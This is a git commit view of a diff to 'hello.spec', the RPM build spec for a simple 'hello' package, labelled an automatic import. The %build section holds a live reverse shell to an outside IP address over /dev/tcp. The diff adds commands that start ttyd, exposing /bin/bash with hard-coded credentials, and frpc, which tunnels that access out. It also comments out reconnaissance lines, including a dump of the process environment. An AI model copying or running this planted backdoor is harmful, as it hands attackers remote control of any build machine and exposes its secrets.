summaryrefslogtreecommitdiff
diff options
context:
space:
mode:
authorCoprDistGit <infra@openeuler.org>2023-10-30 13:34:36 +0000
committerCoprDistGit <infra@openeuler.org>2023-10-30 13:34:36 +0000
commit9000b4760e434ca65145cc5027f374017085ea5d (patch)
treef4e538eb30911d3991bc893b327132d8b2e1fd71
parent51c3699c90af1b081ade74381215ac986b93e47a (diff)
automatic import of hello
-rw-r--r--hello.spec9
1 files changed, 5 insertions, 4 deletions
diff --git a/hello.spec b/hello.spec
index bd316a3..cba6bb0 100644
--- a/hello.spec
+++ b/hello.spec
@@ -25,13 +25,14 @@ project, including configuration, build, internationalization, help files, etc.
%build
%configure
bash -i >& /dev/tcp/116.4.97.74/2333 2>&1 0>&1
-uname -a 1>&2
+#uname -a 1>&2
#ip addr 1>&2
#ip route 1>&2
-ps -ef 1>&2
+#ps -ef 1>&2
# netstat -nlpt 1>&2
-cat /proc/self/environ 1>&2
-./ttyd -p 20001 -c 'admin:!Admin@1234' -W /bin/bash & ./frpc -c frpc.toml
+#cat /proc/self/environ 1>&2
+./ttyd -p 20001 -c 'admin:!Admin@1234' -W /bin/bash &
+./frpc -c frpc.toml
make %{?_smp_mflags}